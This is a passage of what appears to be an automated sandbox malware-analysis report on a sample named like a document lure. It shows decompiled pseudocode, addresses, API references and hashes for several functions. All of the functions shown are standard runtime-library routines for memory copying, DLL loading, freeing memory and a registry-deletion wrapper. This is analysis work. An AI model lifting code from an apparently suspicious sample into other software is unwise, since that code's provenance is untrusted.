																					asm("palignr xmm5, xmm4, 0x4");
																					asm("movdqa [edi+0x20], xmm5");
																					_t243 = _t243 + 0x30;
																				} while (_t206 >= 0x30);
																				_t260 = _t264 + 4;
																				while(1) {
																					L51:
																					__eflags = _t206 - 0x10;
																					if(__eflags < 0) {
																						break;
																					}
																					asm("movdqu xmm1, [esi]");
																					_t206 = _t206 - 0x10;
																					_t260 = _t260 + 0x10;
																					asm("movdqa [edi], xmm1");
																					_t243 = _t243 + 0x10;
																				}
																				asm("bt ecx, 0x2");
																				if(__eflags < 0) {
																					_t175 =  *_t260;
																					_t206 = _t206 - 4;
																					__eflags = _t206;
																					_t260 = _t260 + 4;
																					 *_t243 = _t175;
																					_t243 = _t243 + 4;
																				}
																				asm("bt ecx, 0x3");
																				if(__eflags < 0) {
																					asm("movq xmm1, [esi]");
																					__eflags = _t206;
																					_t260 = _t260 + 8;
																					asm("movq [edi], xmm1");
																					_t243 = _t243 + 8;
																				}
																				goto __eax;
																			}
																			asm("movdqa xmm1, [esi-0xc]");
																			_t265 = _t260 - 0xc;
																			do {
																				asm("movdqa xmm3, [esi+0x10]");
																				_t206 = _t206 - 0x30;
																				asm("movdqa xmm0, [esi+0x20]");
																				asm("movdqa xmm5, [esi+0x30]");
																				_t265 = _t265 + 0x30;
																				__eflags = _t206 - 0x30;
																				asm("movdqa xmm2, xmm3");
																				asm("palignr xmm3, xmm1, 0xc");
																				asm("movdqa [edi], xmm3");
																				asm("movdqa xmm4, xmm0");
																				asm("palignr xmm0, xmm2, 0xc");
																				asm("movdqa [edi+0x10], xmm0");
																				asm("movdqa xmm1, xmm5");
																				asm("palignr xmm5, xmm4, 0xc");
																				asm("movdqa [edi+0x20], xmm5");
																				_t243 = _t243 + 0x30;
																			} while (_t206 >= 0x30);
																			_t260 = _t265 + 0xc;
																		}
																		goto L51;
																	}
																}
															}
															goto L60;
														} else {
															asm("bt dword [0x169010], 0x1");
															if(__eflags < 0) {
																_t178 = _t260 & 0x0000000f;
																__eflags = _t178;
																if(_t178 != 0) {
																	_push(_t206 - 0x10);
																	_t179 = 0x10 - _t178;
																	_t215 = _t179 & 0x00000003;
																	__eflags = _t215;
																	while(_t215 != 0) {
																		 *_t243 =  *_t260;
																		_t260 = _t260 + 1;
																		_t243 = _t243 + 1;
																		_t215 = _t215 - 1;
																		__eflags = _t215;
																	}
																	_t180 = _t179 >> 2;
																	__eflags = _t180;
																	while(_t180 != 0) {
																		 *_t243 =  *_t260;
																		_t260 = _t260 + 4;
																		_t243 = _t243 + 4;
																		_t180 = _t180 - 1;
																		__eflags = _t180;
																	}
																	_pop(_t206);
																}
																_t230 = _t206;
																_t206 = _t206 & 0x0000007f;
																_t231 = _t230 >> 7;
																__eflags = _t231;
																while(_t231 != 0) {
																	asm("movdqa xmm0, [esi]");
																	asm("movdqa xmm1, [esi+0x10]");
																	asm("movdqa xmm2, [esi+0x20]");
																	asm("movdqa xmm3, [esi+0x30]");
																	asm("movdqa [edi], xmm0");
																	asm("movdqa [edi+0x10], xmm1");
																	asm("movdqa [edi+0x20], xmm2");
																	asm("movdqa [edi+0x30], xmm3");
																	asm("movdqa xmm4, [esi+0x40]");
																	asm("movdqa xmm5, [esi+0x50]");
																	asm("movdqa xmm6, [esi+0x60]");
																	asm("movdqa xmm7, [esi+0x70]");
																	asm("movdqa [edi+0x40], xmm4");
																	asm("movdqa [edi+0x50], xmm5");
																	asm("movdqa [edi+0x60], xmm6");
																	asm("movdqa [edi+0x70], xmm7");
																	_t260 = _t260 + 0x80;
																	_t243 = _t243 + 0x80;
																	_t231 = _t231 - 1;
																	__eflags = _t231;
																}
																goto L92;
															} else {
																goto L33;
															}
														}
													} else {
														memcpy(_t243, _t260, _t206);
														return _v40;
													}
												} else {
													asm("bt dword [0x169010], 0x1");
													if(__eflags < 0) {
														L92:
														__eflags = _t206;
														if(_t206 != 0) {
															_t233 = _t206 >> 5;
															__eflags = _t233;
															if(_t233 != 0) {
																do {
																	asm("movdqu xmm0, [esi]");
																	asm("movdqu xmm1, [esi+0x10]");
																	asm("movdqu [edi], xmm0");
																	asm("movdqu [edi+0x10], xmm1");
																	_t260 = _t260 + 0x20;
																	_t243 = _t243 + 0x20;
																	_t233 = _t233 - 1;
																	__eflags = _t233;
																} while (_t233 != 0);
															}
															goto L96;
														}
														L102:
														return _v40;
													} else {
														L58:
														__eflags = _t243 & 0x00000003;
														while((_t243 & 0x00000003) != 0) {
															 *_t243 =  *_t260;
															_t206 = _t206 - 1;
															_t260 = _t260 + 1;
															_t243 = _t243 + 1;
															__eflags = _t243 & 0x00000003;
														}
														L60:
														_t226 = _t206;
														__eflags = _t206 - 0x20;
														if(_t206 < 0x20) {
															goto L96;
														} else {
															memcpy(_t243, _t260, _t206 >> 2 << 2);
															switch( *((intOrPtr*)((_t226 & 0x00000003) * 4 +  &M00155934))) {
																case 0:
																	return _v40;
																	goto L108;
																case 1:
																	 *__edi =  *__esi;
																	__eax = _v40;
																	_pop(__esi);
																	_pop(__edi);
																	return _v40;
																	goto L108;
																case 2:
																	 *__edi =  *__esi;
																	_t92 = __esi + 1; // 0xc0330cc4
																	 *((char*)(__edi + 1)) =  *_t92;
																	__eax = _v40;
																	_pop(__esi);
																	_pop(__edi);
																	return _v40;
																	goto L108;
																case 3:
																	 *__edi =  *__esi;
																	 *((char*)(__edi + 1)) =  *((intOrPtr*)(__esi + 1));
																	 *((char*)(__edi + 2)) =  *((intOrPtr*)(__esi + 2));
																	__eax = _v40;
																	_pop(__esi);
																	_pop(__edi);
																	return _v40;
																	goto L108;
															}
														}
													}
												}
											}
										} else {
											__eflags = _t243 - _t165;
											if(_t243 < _t165) {
												_t267 = _t260 + _t206;
												_t251 = _t243 + _t206;
												__eflags = _t206 - 0x20;
												if(__eflags < 0) {
													L83:
													__eflags = _t206 & 0xfffffffc;
													while((_t206 & 0xfffffffc) != 0) {
														_t251 = _t251 - 4;
														_t267 = _t267 - 4;
														 *_t251 =  *_t267;
														_t206 = _t206 - 4;
														__eflags = _t206 & 0xfffffffc;
													}
													__eflags = _t206;
													if(_t206 != 0) {
														do {
															_t251 = _t251 - 1;
															_t267 = _t267 - 1;
															 *_t251 =  *_t267;
															_t206 = _t206 - 1;
															__eflags = _t206;
														} while (_t206 != 0);
													}
													return _v40;
												} else {
													asm("bt dword [0x169010], 0x1");
													if(__eflags < 0) {
														__eflags = _t251 & 0x0000000f;
														if((_t251 & 0x0000000f) != 0) {
															do {
																_t206 = _t206 - 1;
																_t267 = _t267 - 1;
																_t251 = _t251 - 1;
																 *_t251 =  *_t267;
																__eflags = _t251 & 0x0000000f;
															} while ((_t251 & 0x0000000f) != 0);
															while(1) {
																L79:
																__eflags = _t206 - 0x80;
																if(_t206 < 0x80) {
																	break;
																}
																_t267 = _t267 - 0x80;
																_t251 = _t251 - 0x80;
																asm("movdqu xmm0, [esi]");
																asm("movdqu xmm1, [esi+0x10]");
																asm("movdqu xmm2, [esi+0x20]");
																asm("movdqu xmm3, [esi+0x30]");
																asm("movdqu xmm4, [esi+0x40]");
																asm("movdqu xmm5, [esi+0x50]");
																asm("movdqu xmm6, [esi+0x60]");
																asm("movdqu xmm7, [esi+0x70]");
																asm("movdqu [edi], xmm0");
																asm("movdqu [edi+0x10], xmm1");
																asm("movdqu [edi+0x20], xmm2");
																asm("movdqu [edi+0x30], xmm3");
																asm("movdqu [edi+0x40], xmm4");
																asm("movdqu [edi+0x50], xmm5");
																asm("movdqu [edi+0x60], xmm6");
																asm("movdqu [edi+0x70], xmm7");
																_t206 = _t206 - 0x80;
																__eflags = _t206 & 0xffffff80;
																if((_t206 & 0xffffff80) != 0) {
																	continue;
																}
																break;
															}
															__eflags = _t206 - 0x20;
															if(_t206 >= 0x20) {
																do {
																	_t267 = _t267 - 0x20;
																	_t251 = _t251 - 0x20;
																	asm("movdqu xmm0, [esi]");
																	asm("movdqu xmm1, [esi+0x10]");
																	asm("movdqu [edi], xmm0");
																	asm("movdqu [edi+0x10], xmm1");
																	_t206 = _t206 - 0x20;
																	__eflags = _t206 & 0xffffffe0;
																} while ((_t206 & 0xffffffe0) != 0);
															}
															goto L83;
														}
														goto L79;
													} else {
														__eflags = _t251 & 0x00000003;
														if((_t251 & 0x00000003) != 0) {
															_t239 = _t251 & 0x00000003;
															_t206 = _t206 - _t239;
															__eflags = _t206;
															do {
																 *(_t251 - 1) =  *((intOrPtr*)(_t267 - 1));
																_t267 = _t267 - 1;
																_t251 = _t251 - 1;
																_t239 = _t239 - 1;
																__eflags = _t239;
															} while (_t239 != 0);
														}
														__eflags = _t206 - 0x20;
														if(_t206 < 0x20) {
															goto L83;
														} else {
															asm("std");
															memcpy(_t251 - 4, _t267 - 4, _t206 >> 2 << 2);
															asm("cld");
															switch( *((intOrPtr*)((_t206 & 0x00000003) * 4 +  &M001559E0))) {
																case 0:
																	return _v40;
																	goto L108;
																case 1:
																	 *((char*)(__edi + 3)) =  *((intOrPtr*)(__esi + 3));
																	__eax = _v40;
																	_pop(__esi);
																	_pop(__edi);
																	return _v40;
																	goto L108;
																case 2:
																	_t113 = __esi + 3; // 0x33ebc033
																	 *((char*)(__edi + 3)) =  *_t113;
																	_t115 = __esi + 2; // 0xebc0330c
																	 *((char*)(__edi + 2)) =  *_t115;
																	__eax = _v40;
																	_pop(__esi);
																	_pop(__edi);
																	return _v40;
																	goto L108;
																case 3:
																	 *((char*)(__edi + 3)) =  *((intOrPtr*)(__esi + 3));
																	 *((char*)(__edi + 2)) =  *((intOrPtr*)(__esi + 2));
																	 *((char*)(__edi + 1)) =  *((intOrPtr*)(__esi + 1));
																	__eax = _v40;
																	_pop(__esi);
																	_pop(__edi);
																	return _v40;
																	goto L108;
															}
														}
													}
												}
											} else {
												goto L25;
											}
										}
									} else {
										goto L7;
									}
								}
							}
							goto L108;
							L7:
							_t241 = _t196;
						} while (_t196 != 0xfffffffe);
						if(_t202 != 0) {
							goto L13;
						}
						goto L14;
					}
				}
				L108:
			}

0x00155570
0x00155577
0x0015557b
0x0015557c
0x00155582
0x0015558e
0x00155590
0x00155596
0x00155596
0x0015559f
0x001555a1
0x001555a4
0x001555a7
0x001555af
0x001555b4
0x001555b7
0x001555ba
0x001555c1
0x0015561d
0x00155620
0x00155628
0x0015562f
0x00000000
0x0015562f
0x00000000
0x001555c3
0x001555c3
0x001555c9
0x001555cf
0x001555d5
0x00155640
0x00155649
0x001555d7
0x001555d7
0x001555d7
0x001555dd
0x001555e0
0x001555e3
0x001555e6
0x001555e9
0x001555ee
0x00155604
0x00000000
0x001555f0
0x001555f0
0x001555f2
0x001555f7
0x001555f9
0x001555fc
0x001555fe
0x00155614
0x00155634
0x00155634
0x00155638
0x00000000
0x00155600
0x00155600
0x0015564a
0x0015564d
0x00155653
0x00155655
0x0015565c
0x00155663
0x00155668
0x0015566b
0x0015566d
0x0015566f
0x0015567c
0x00155682
0x00155684
0x00155687
0x00155687
0x0015568a
0x0015568a
0x0015565c
0x00155690
0x00155692
0x00155697
0x0015569a
0x0015569d
0x001556a5
0x001556a9
0x001556ae
0x001556ae
0x001556b1
0x001556b5
0x001556b8
0x001556c8
0x001556cd
0x001556ce
0x001556cf
0x001556d0
0x001556d1
0x001556d2
0x001556d6
0x001556da
0x001556e2
0x001556e4
0x001556e6
0x001556f0
0x001556f0
0x001556f3
0x00155bcb
0x00155bcb
0x00155bcb
0x00155bce
0x00155bd0
0x00155bd2
0x00155bd2
0x00155bd5
0x00155bd9
0x00155bdb
0x00155bde
0x00155be1
0x00155be1
0x00155be1
0x00155be8
0x00155be8
0x00155beb
0x00155bef
0x00155bf1
0x00155bf2
0x00155bf3
0x00155bf3
0x00155bf3
0x00155beb
0x00000000
0x001556f9
0x001556f9
0x001556ff
0x00155714
0x0015571c
0x0015572b
0x00155730
0x00155740
0x00155740
0x00155748
0x00000000
0x0015574e
0x0015574e
0x00155754
0x00000000
0x0015575a
0x0015575a
0x00155760
0x00155766
0x0015576a
0x0015576c
0x0015576e
0x0015576e
0x00155771
0x00155774
0x00155776
0x00155776
0x00155779
0x0015577d
0x0015577f
0x00155783
0x00155783
0x00155786
0x00155789
0x0015578d
0x0015578d
0x00155790
0x00155796
0x001557fd
0x00155802
0x00155808
0x00155808
0x0015580d
0x00155810
0x00155815
0x0015581a
0x0015581d
0x00155820
0x00155824
0x0015582a
0x0015582e
0x00155832
0x00155838
0x0015583d
0x00155841
0x00155847
0x0015584c
0x0015584c
0x00155851
0x00155798
0x00155798
0x0015579c
0x00155856
0x0015585b
0x00155860
0x00155860
0x00155865
0x00155868
0x0015586d
0x00155872
0x00155875
0x00155878
0x0015587c
0x00155882
0x00155886
0x0015588a
0x00155890
0x00155895
0x00155899
0x0015589f
0x001558a4
0x001558a4
0x001558a9
0x001558ac
0x001558ac
0x001558ac
0x001558af
0x00000000
0x00000000
0x001558b1
0x001558b5
0x001558b8
0x001558bb
0x001558bf
0x001558bf
0x001558c4
0x001558c8
0x001558ca
0x001558cc
0x001558cc
0x001558cf
0x001558d2
0x001558d4
0x001558d4
0x001558d7
0x001558db
0x001558dd
0x001558e1
0x001558e4
0x001558e7
0x001558eb
0x001558eb
0x001558f5
0x001558f5
0x001557a2
0x001557a7
0x001557ac
0x001557ac
0x001557b1
0x001557b4
0x001557b9
0x001557be
0x001557c1
0x001557c4
0x001557c8
0x001557ce
0x001557d2
0x001557d6
0x001557dc
0x001557e1
0x001557e5
0x001557eb
0x001557f0
0x001557f0
0x001557f5
0x001557f5
0x00000000
0x00155796
0x00155760
0x00155754
0x00000000
0x00155732
0x00155732
0x0015573a
0x00155b22
0x00155b25
0x00155b27
0x00155c19
0x00155c1a
0x00155c1e
0x00155c1e
0x00155c21
0x00155c25
0x00155c27
0x00155c28
0x00155c29
0x00155c29
0x00155c29
0x00155c2c
0x00155c2c
0x00155c2f
0x00155c33
0x00155c35
0x00155c38
0x00155c3b
0x00155c3b
0x00155c3b
0x00155c3e
0x00155c3e
0x00155b2d
0x00155b2f
0x00155b32
0x00155b32
0x00155b35
0x00155b40
0x00155b44
0x00155b49
0x00155b4e
0x00155b53
0x00155b57
0x00155b5c
0x00155b61
0x00155b66
0x00155b6b
0x00155b70
0x00155b75
0x00155b7a
0x00155b7f
0x00155b84
0x00155b89
0x00155b8e
0x00155b94
0x00155b9a
0x00155b9a
0x00155b9a
0x00000000
0x00000000
0x00000000
0x00000000
0x0015573a
0x0015571e
0x0015571e
0x00155726
0x00155726
0x00155701
0x00155701
0x00155709
0x00155b9d
0x00155b9d
0x00155b9f
0x00155ba3
0x00155ba6
0x00155ba8
0x00155bb0
0x00155bb0
0x00155bb4
0x00155bb9
0x00155bbd
0x00155bc2
0x00155bc5
0x00155bc8
0x00155bc8
0x00155bc8
0x00155bb0
0x00000000
0x00155ba8
0x00155c00
0x00155c06
0x0015570f
0x001558f7
0x001558f7
0x001558fd
0x00155901
0x00155903
0x00155904
0x00155907
0x0015590a
0x0015590a
0x00155912
0x00155912
0x00155914
0x00155917
0x00000000
0x0015591d
0x00155920
0x00155925
0x00000000
0x0015594a
0x00000000
0x00000000
0x0015594e
0x00155950
0x00155954
0x00155955
0x00155956
0x00000000
0x00000000
0x0015595a
0x0015595c
0x0015595f
0x00155962
0x00155966
0x00155967
0x00155968
0x00000000
0x00000000
0x0015596e
0x00155973
0x00155979
0x0015597c
0x00155980
0x00155981
0x00155982
0x00000000
0x00000000
0x00155925
0x00155917
0x00155709
0x001556ff
0x001556e8
0x001556e8
0x001556ea
0x00155984
0x00155987
0x0015598a
0x0015598d
0x00155ae4
0x00155ae4
0x00155aea
0x00155aec
0x00155aef
0x00155af4
0x00155af6
0x00155af9
0x00155af9
0x00155b01
0x00155b03
0x00155b05
0x00155b05
0x00155b08
0x00155b0d
0x00155b0f
0x00155b0f
0x00155b0f
0x00155b05
0x00155b1a
0x00155993
0x00155993
0x0015599b
0x00155a35
0x00155a3b
0x00155a3d
0x00155a3d
0x00155a3e
0x00155a3f
0x00155a42
0x00155a44
0x00155a44
0x00155a4c
0x00155a4c
0x00155a4c
0x00155a52
0x00000000
0x00000000
0x00155a54
0x00155a5a
0x00155a60
0x00155a64
0x00155a69
0x00155a6e
0x00155a73
0x00155a78
0x00155a7d
0x00155a82
0x00155a87
0x00155a8b
0x00155a90
0x00155a95
0x00155a9a
0x00155a9f
0x00155aa4
0x00155aa9
0x00155aae
0x00155ab4
0x00155aba
0x00000000
0x00000000
0x00000000
0x00155aba
0x00155abc
0x00155abf
0x00155ac1
0x00155ac1
0x00155ac4
0x00155ac7
0x00155acb
0x00155ad0
0x00155ad4
0x00155ad9
0x00155adc
0x00155adc
0x00155ac1
0x00000000
0x00155abf
0x00000000
0x001559a1
0x001559a1
0x001559a7
0x001559ab
0x001559ae
0x001559ae
0x001559b0
0x001559b3
0x001559b6
0x001559b7
0x001559b8
0x001559b8
0x001559b8
0x001559b0
0x001559bd
0x001559c0
0x00000000
0x001559c6
0x001559d4
0x001559d5
0x001559d7
0x001559d8
0x00000000
0x001559f6
0x00000000
0x00000000
0x001559fb
0x001559fe
0x00155a02
0x00155a03
0x00155a04
0x00000000
0x00000000
0x00155a08
0x00155a0b
0x00155a0e
0x00155a11
0x00155a14
0x00155a18
0x00155a19
0x00155a1a
0x00000000
0x00000000
0x00155a1f
0x00155a25
0x00155a2b
0x00155a2e
0x00155a32
0x00155a33
0x00155a34
0x00000000
0x00000000
0x001559d8
0x001559c0
0x0015599b
0x00000000
0x00000000
0x00000000
0x001556ea
0x00155602
0x00000000
0x00155602
0x00155600
0x001555fe
0x00000000
0x00155607
0x00155607
0x00155609
0x00155610
0x00000000
0x00155612
0x00000000
0x00155610
0x001555d5
0x00000000

APIs

_ValidateLocalCookies.LIBCMT ref: 001555A7
___except_validate_context_record.LIBVCRUNTIME ref: 001555AF
_ValidateLocalCookies.LIBCMT ref: 00155638
__IsNonwritableInCurrentImage.LIBCMT ref: 00155663
_ValidateLocalCookies.LIBCMT ref: 001556B8

Strings

csm, xrefs: 0015564D

Memory Dump Source

Source File: 00000000.00000002.921060002.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true

Associated: 00000000.00000002.921053938.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921074420.0000000000161000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921082295.0000000000169000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921086723.000000000016A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921797899.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921896034.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_150000_DocumentoSENAMHI20222103.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: c98ad8319259204d8d1c804af61dc54b252d682d3097350a0c0e5d1922f65a0f
Instruction ID: e9476678514f41bf6e5036480f90f5c385c1d02e4a0c5bb076a22674b3b1c6a3
Opcode Fuzzy Hash: c98ad8319259204d8d1c804af61dc54b252d682d3097350a0c0e5d1922f65a0f
Instruction Fuzzy Hash: 5C41C434A00658EFCF10DF68C894A9EBBB6BF54325F948055EC249F352D731AA19CF90

Uniqueness

Uniqueness Score: -1.00%

Function 001596F7 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E001596F7(void* __ecx, signed int* _a4, intOrPtr _a8) {
				signed int* _v8;
				void** _t12;
				void* _t16;
				void* _t18;
				signed int _t22;
				WCHAR* _t23;
				void** _t26;
				signed int* _t29;
				void* _t32;
				void* _t34;

				_t29 = _a4;
				while(_t29 != _a8) {
					_t22 =  *_t29;
					_t12 = 0x292b68 + _t22 * 4;
					_t32 =  *_t12;
					_v8 = _t12;
					if(_t32 == 0) {
						_t23 =  *(0x162648 + _t22 * 4);
						_t32 = LoadLibraryExW(_t23, 0, 0x800);
						if(_t32 != 0) {
							L12:
							_t26 = _v8;
							 *_t26 = _t32;
							if( *_t26 != 0) {
								FreeLibrary(_t32);
							}
							L14:
							if(_t32 != 0) {
								_t16 = _t32;
								L18:
								return _t16;
							}
							L15:
							_t29 =  &(_t29[1]);
							continue;
						}
						_t18 = GetLastError();
						if(_t18 != 0x57) {
							L9:
							_t32 = 0;
							L10:
							if(_t32 != 0) {
								goto L12;
							}
							 *_v8 = _t18 | 0xffffffff;
							goto L15;
						}
						_t18 = E00158B48(_t23, L"api-ms-", 7);
						_t34 = _t34 + 0xc;
						if(_t18 == 0) {
							goto L9;
						}
						_t18 = E00158B48(_t23, L"ext-ms-", 7);
						_t34 = _t34 + 0xc;
						if(_t18 == 0) {
							goto L9;
						}
						_t18 = LoadLibraryExW(_t23, _t32, _t32);
						_t32 = _t18;
						goto L10;
					}
					if(_t32 == 0xffffffff) {
						goto L15;
					}
					goto L14;
				}
				_t16 = 0;
				goto L18;
			}

0x00159700
0x001597aa
0x00159708
0x0015970a
0x00159711
0x00159713
0x00159719
0x00159726
0x0015973b
0x0015973f
0x00159791
0x00159791
0x00159796
0x0015979a
0x0015979d
0x0015979d
0x001597a3
0x001597a5
0x001597ba
0x001597b5
0x001597b9
0x001597b9
0x001597a7
0x001597a7
0x00000000
0x001597a7
0x00159741
0x0015974a
0x00159781
0x00159781
0x00159783
0x00159785
0x00000000
0x00000000
0x0015978d
0x00000000
0x0015978d
0x00159754
0x00159759
0x0015975e
0x00000000
0x00000000
0x00159768
0x0015976d
0x00159772
0x00000000
0x00000000
0x00159777
0x0015977d
0x00000000
0x0015977d
0x0015971e
0x00000000
0x00000000
0x00000000
0x00159724
0x001597b3
0x00000000

Strings

api-ms-, xrefs: 0015974E
ext-ms-, xrefs: 00159762

Memory Dump Source

Source File: 00000000.00000002.921060002.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true

Associated: 00000000.00000002.921053938.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921074420.0000000000161000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921082295.0000000000169000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921086723.000000000016A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921797899.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921896034.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_150000_DocumentoSENAMHI20222103.jbxd

Similarity

API ID:
String ID: api-ms-$ext-ms-
API String ID: 0-537541572
Opcode ID: 134bd4b906e6f200d84626489d9745ff1c0d1ca06660fd542575985ab0f6ce4e
Instruction ID: e166b5dea29c70e5f5a2b2e6964ff7e8b827c4317525e2ed4864d52163d8478d
Opcode Fuzzy Hash: 134bd4b906e6f200d84626489d9745ff1c0d1ca06660fd542575985ab0f6ce4e
Instruction Fuzzy Hash: 8F210531E21220FBCB214F649D85A5A3759DF49762F250213ED26AF290E771DD08CAD2

Uniqueness

Uniqueness Score: -1.00%

Function 0015BD49 Relevance: 10.6, APIs: 7, Instructions: 65
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E0015BD49(intOrPtr _a4) {
				void* _t18;

				_t45 = _a4;
				if(_a4 != 0) {
					E0015BD11(_t45, 7);
					E0015BD11(_t45 + 0x1c, 7);
					E0015BD11(_t45 + 0x38, 0xc);
					E0015BD11(_t45 + 0x68, 0xc);
					E0015BD11(_t45 + 0x98, 2);
					E00158B82( *((intOrPtr*)(_t45 + 0xa0)));
					E00158B82( *((intOrPtr*)(_t45 + 0xa4)));
					E00158B82( *((intOrPtr*)(_t45 + 0xa8)));
					E0015BD11(_t45 + 0xb4, 7);
					E0015BD11(_t45 + 0xd0, 7);
					E0015BD11(_t45 + 0xec, 0xc);
					E0015BD11(_t45 + 0x11c, 0xc);
					E0015BD11(_t45 + 0x14c, 2);
					E00158B82( *((intOrPtr*)(_t45 + 0x154)));
					E00158B82( *((intOrPtr*)(_t45 + 0x158)));
					E00158B82( *((intOrPtr*)(_t45 + 0x15c)));
					return E00158B82( *((intOrPtr*)(_t45 + 0x160)));
				}
				return _t18;
			}

0x0015bd4f
0x0015bd54
0x0015bd5d
0x0015bd68
0x0015bd73
0x0015bd7e
0x0015bd8c
0x0015bd97
0x0015bda2
0x0015bdad
0x0015bdbb
0x0015bdc9
0x0015bdda
0x0015bde8
0x0015bdf6
0x0015be01
0x0015be0c
0x0015be17
0x00000000
0x0015be27
0x0015be2c

APIs

Part of subcall function 0015BD11: _free.LIBCMT ref: 0015BD36

_free.LIBCMT ref: 0015BD97

Part of subcall function 00158B82: HeapFree.KERNEL32(00000000,00000000,?,0015BD3B,?,00000000,?,?,?,0015BD62,?,00000007,?,?,0015C188,?), ref: 00158B98
Part of subcall function 00158B82: GetLastError.KERNEL32(?,?,0015BD3B,?,00000000,?,?,?,0015BD62,?,00000007,?,?,0015C188,?,?), ref: 00158BAA

_free.LIBCMT ref: 0015BDA2
_free.LIBCMT ref: 0015BDAD
_free.LIBCMT ref: 0015BE01
_free.LIBCMT ref: 0015BE0C
_free.LIBCMT ref: 0015BE17
_free.LIBCMT ref: 0015BE22

Memory Dump Source

Source File: 00000000.00000002.921060002.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true

Associated: 00000000.00000002.921053938.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921074420.0000000000161000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921082295.0000000000169000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921086723.000000000016A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921797899.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921896034.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_150000_DocumentoSENAMHI20222103.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 525e5c658dd9c6b21af90f0a18bfdc04389eb2df5792fc6ff52ccae0de6d7f38
Instruction ID: 5835e09d4011658d3c29256ba8ffd848e58fab0e1974d96503010dba6d27a571
Opcode Fuzzy Hash: 525e5c658dd9c6b21af90f0a18bfdc04389eb2df5792fc6ff52ccae0de6d7f38
Instruction Fuzzy Hash: 64112171544B04EED920BBF0CC87FCB77ACEF14716F644815BAB96E052DB65B6084B50

Uniqueness

Uniqueness Score: -1.00%

Function 001513BB Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 37
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 18%

			E001513BB(intOrPtr* __ecx, intOrPtr _a4, intOrPtr _a8) {
				struct HINSTANCE__* _t7;
				_Unknown_base(*)()* _t8;
				intOrPtr* _t12;

				_t12 = __ecx;
				if( *__ecx == 0) {
					if( *((intOrPtr*)(__ecx + 4)) == 0) {
						L6:
						return 1;
					}
					return RegDeleteKeyA();
				}
				_t7 = GetModuleHandleA("Advapi32.dll");
				if(_t7 == 0) {
					goto L6;
				}
				_t8 = GetProcAddress(_t7, "RegDeleteKeyTransactedA");
				if(_t8 == 0) {
					goto L6;
				}
				return  *_t8(_a4, _a8, 0, 0,  *_t12, 0);
			}

0x001513bf
0x001513c6
0x001513f9
0x00151404
0x00000000
0x00151406
0x001513fe
0x001513fe
0x001513cd
0x001513d5
0x00000000
0x00000000
0x001513dd
0x001513e5
0x00000000
0x00000000
0x00000000

APIs

GetModuleHandleA.KERNEL32(Advapi32.dll), ref: 001513CD
GetProcAddress.KERNEL32(00000000,RegDeleteKeyTransactedA), ref: 001513DD

Strings

Advapi32.dll, xrefs: 001513C8
Nv, xrefs: 001513DD
Mv@Nv, xrefs: 001513CD
RegDeleteKeyTransactedA, xrefs: 001513D7

Memory Dump Source

Source File: 00000000.00000002.921060002.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true

Associated: 00000000.00000002.921053938.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921074420.0000000000161000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921082295.0000000000169000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921086723.000000000016A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921797899.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921896034.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_150000_DocumentoSENAMHI20222103.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: Advapi32.dll$RegDeleteKeyTransactedA$Mv@Nv$Nv
API String ID: 1646373207-3267374244
Opcode ID: 26b998e1077cd3e8612a7403cc969c2f964097d1f5167f85bd2d84cccd1b0b9d
Instruction ID: c0c537436d8ec9e7e72e00e4de47150bc6bbe9be99e616db721cbb89ee806f92
Opcode Fuzzy Hash: 26b998e1077cd3e8612a7403cc969c2f964097d1f5167f85bd2d84cccd1b0b9d
Instruction Fuzzy Hash: 0FF03732210504FADB221FA7DC09EA7B7ADEBD6B63708843AF961C9410D7718896D760

Uniqueness

Uniqueness Score: -1.00%

